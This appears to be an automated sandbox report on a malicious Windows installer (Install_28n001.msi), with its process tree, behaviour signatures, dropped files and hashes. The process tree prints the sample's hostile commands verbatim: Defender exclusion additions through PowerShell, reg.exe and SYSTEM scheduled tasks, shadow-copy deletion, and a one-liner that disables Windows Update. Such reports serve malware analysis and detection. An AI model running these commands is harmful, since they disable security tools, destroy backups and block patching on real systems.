Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260710-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260710-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    29/07/2026, 01:50

General

  • Target
    Install_28n001.msi
  • Size 7.7MB
  • Sample260729-b9a7asde52
  • SHA256 20f905e5707b1da7873d3d782d243975ab7839ce641359cb84cdb38c55b20700
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 14 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 7 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 6 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 18 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Install_28n001.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:4596
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4676
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4624
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 0F504ACDA560094F4229602AAFC1D56D E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1264
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:1248
  • C:\Users\Public\QkWraI\2Vjzay.exe
    "C:\Users\Public\QkWraI\2Vjzay.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4792
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\QkWraI\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:3240
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\QkWraI\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4684
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:5340
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2776
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4300
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3480
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2456
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3580
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:5448
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3768
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:800
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4784
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4916
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1596
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3028
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:4888
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:2824
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4580
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:6076
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1644
                        • C:\Program Files (x86)\eNyMTX\eNyMTX.exe
                          "C:\Program Files (x86)\eNyMTX\eNyMTX.exe"
                          2⤵
                            PID:1100
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c vssadmin delete shadows /all /quiet
                              3⤵
                              • Executes a command shell one-liner
                              PID:5300
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:2636
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\eNyMTX" /inheritance:r
                                4⤵
                                • Modifies file permissions
                                PID:3436
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:6072
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:1272
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:5724
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\eNyMTX" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Modifies file permissions
                                PID:3504
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\eNyMTX\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              PID:5492
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\eNyMTX\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:620
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                  PID:3496
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                    PID:1076
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:2468
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    4⤵
                                      PID:408
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX\eNyMTX.exe" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:3768
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\eNyMTX\eNyMTX.exe" /inheritance:r
                                      4⤵
                                      • Modifies file permissions
                                      PID:4440
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX\eNyMTX.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:5052
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\eNyMTX\eNyMTX.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Modifies file permissions
                                      PID:204
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:3960
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\eNyMTX\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Modifies file permissions
                                      PID:4940
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX\XPSPLOG.dll" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:4904
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\eNyMTX\XPSPLOG.dll" /inheritance:r
                                      4⤵
                                      • Modifies file permissions
                                      PID:1604
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:572
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\eNyMTX\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Modifies file permissions
                                      PID:1240
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\eNyMTX\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:2892
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\eNyMTX\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Modifies file permissions
                                      PID:2128
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\QkWraI" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:4132
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\QkWraI" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:796
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                1⤵
                                  PID:3392
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4964
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:560
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:5024
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:4464
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:2444
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:1604
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:2908
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5048
                                • C:\Program Files (x86)\eNyMTX\eNyMTX.exe
                                  "C:\Program Files (x86)\eNyMTX\eNyMTX.exe"
                                  1⤵
                                    PID:4236
                                  • C:\Program Files (x86)\eNyMTX\eNyMTX.exe
                                    "C:\Program Files (x86)\eNyMTX\eNyMTX.exe"
                                    1⤵
                                      PID:1748
                                    • C:\Program Files (x86)\12H2JHdWO\ztEc6.exe
                                      "C:\Program Files (x86)\12H2JHdWO\ztEc6.exe"
                                      1⤵
                                        PID:5552
                                      • C:\Windows\system32\cmd.exe
                                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\eNyMTX" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        PID:5464
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\eNyMTX\eNyMTX.exe" /grant:r Users:(RX) /deny Users:(DE)
                                        1⤵
                                        • Modifies file permissions
                                        PID:5624
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\eNyMTX\image.png" /inheritance:r
                                        1⤵
                                        • Modifies file permissions
                                        PID:1312
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\eNyMTX\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        1⤵
                                        • Modifies file permissions
                                        PID:1644
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\eNyMTX\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        1⤵
                                        • Modifies file permissions
                                        PID:1704
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\eNyMTX\thumbs.db" /inheritance:r
                                        1⤵
                                        • Modifies file permissions
                                        PID:1164
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\eNyMTX\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        1⤵
                                        • Modifies file permissions
                                        PID:2808

                                      Network

                                            MITRE ATT&CK Enterprise v16

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            e594463.rbs

                                            • Path C:\Config.Msi\e594463.rbs
                                            • Size 7KB
                                            • SHA256 a1cd1b5eb0acc665f7be12b70dea6023f9954167e5e13b47c46a4216e986936c
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\12H2JHdWO\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 e7a2c04f6152fea1fc8a04eac5da014ecaab34e9357fe8c6ac5ae249b7f82283
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\eNyMTX\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 1b1e6ffd5c773fbb410e5ff3742831c124aeb9b116f0b1a0750506e3ae0a320c
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            eNyMTX.exe

                                            • Path C:\Program Files (x86)\eNyMTX\eNyMTX.exe
                                            • Size 145KB
                                            • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            image.png

                                            • Path C:\Program Files (x86)\eNyMTX\image.png
                                            • Size 4.9MB
                                            • SHA256 d906ced1ef67a482c84e0dc01004efba669c43434313bf2f90df412d2472e7a9
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            thumbs.db

                                            • Path C:\Program Files (x86)\eNyMTX\thumbs.db
                                            • Size 358KB
                                            • SHA256 d56005b213c44e91e91c947c90873a7a79facb496d5432d7bdc2c1ad356c1e64
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            destopbak.ini

                                            • Path C:\Users\Public\Music\destopbak.ini
                                            • Size 2B
                                            • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                            • MD5 SHA1 SHA512

                                            2Vjzay.exe

                                            • Path C:\Users\Public\QkWraI\2Vjzay.exe
                                            • Size 135KB
                                            • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            UxEnhance64.dll

                                            • Path C:\Users\Public\QkWraI\UxEnhance64.dll
                                            • Size 3.1MB
                                            • SHA256 8fa127a72985e13e59cc2c4f5fec274bb7c95e6b93ed454adea78f795f1462eb
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            adoresd.dat

                                            • Path C:\Users\Public\QkWraI\adoresd.dat
                                            • Size 4.8MB
                                            • SHA256 b3f9b510347ed794900fa58adaad5bfe39f10663f1b49b791902af5ed688ce29
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            msadox.tb

                                            • Path C:\Users\Public\QkWraI\msadox.tb
                                            • Size 8KB
                                            • SHA256 1fec09576ac32464a5d0a9eb7b30450e47a0a9b8a652b57f688747eca61e3fbc
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            MSI4AFA.tmp

                                            • Path C:\Windows\Installer\MSI4AFA.tmp
                                            • Size 7.7MB
                                            • SHA256 8e94f1b2fd82b6e354f845b45782f03202b1decdf3f32b7a6446cae4e7ac1ecc
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            e594462.msi

                                            • Path C:\Windows\Installer\e594462.msi
                                            • Size 7.7MB
                                            • SHA256 20f905e5707b1da7873d3d782d243975ab7839ce641359cb84cdb38c55b20700
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            metadata-2

                                            • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                            • Size 26.1MB
                                            • SHA256 73b29afcabe6187056e14e42053aa3ee56b2174fc0be5228228ca72b98f91d5b
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            {9cbac715-4c5f-460d-a5f4-ccea17cfb668}_OnDiskSnapshotProp

                                            • Path \??\Volume{5d76dc85-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{9cbac715-4c5f-460d-a5f4-ccea17cfb668}_OnDiskSnapshotProp
                                            • Size 6KB
                                            • SHA256 9aaaf11865c00c40c4dca2dd02faea43f648fa35aef51b999e6484a6793385ec
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            xxxx.ini

                                            • Path \??\c:\xxxx.ini
                                            • Size 2B
                                            • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                            • MD5 SHA1 SHA512

                                            memory/1100-192-0x00000000017B0000-0x00000000017B1000-memory.dmp

                                            memory/1100-185-0x0000000001790000-0x0000000001791000-memory.dmp

                                            memory/1100-239-0x0000000003C40000-0x0000000004429000-memory.dmp

                                            memory/1100-227-0x0000000003C40000-0x0000000004429000-memory.dmp

                                            memory/1100-214-0x0000000010000000-0x0000000010061000-memory.dmp

                                            memory/1100-205-0x0000000003C40000-0x0000000004429000-memory.dmp

                                            memory/1100-204-0x00000000030A0000-0x00000000030B4000-memory.dmp

                                            memory/1100-197-0x0000000003C40000-0x0000000004429000-memory.dmp

                                            memory/1100-193-0x0000000003C40000-0x0000000004429000-memory.dmp

                                            memory/1100-191-0x0000000003C40000-0x0000000004429000-memory.dmp

                                            memory/1100-187-0x00000000747C0000-0x0000000074F0A000-memory.dmp

                                            memory/1264-16-0x00007FF8A8390000-0x00007FF8A83A2000-memory.dmp

                                            memory/1264-44-0x00007FF8A8390000-0x00007FF8A83A2000-memory.dmp

                                            memory/1264-12-0x00007FF8C2330000-0x00007FF8C2332000-memory.dmp

                                            memory/1264-13-0x00007FF89E760000-0x00007FF89EDC1000-memory.dmp

                                            memory/1748-250-0x0000000000860000-0x0000000000861000-memory.dmp

                                            memory/1748-251-0x00000000747C0000-0x0000000074F0A000-memory.dmp

                                            memory/1932-89-0x000001BD228A0000-0x000001BD2292A000-memory.dmp

                                            memory/1932-84-0x000001BD22770000-0x000001BD227BE000-memory.dmp

                                            memory/1932-66-0x00007FF8C2340000-0x00007FF8C2342000-memory.dmp

                                            memory/1932-64-0x000001BD23460000-0x000001BD23D1E000-memory.dmp

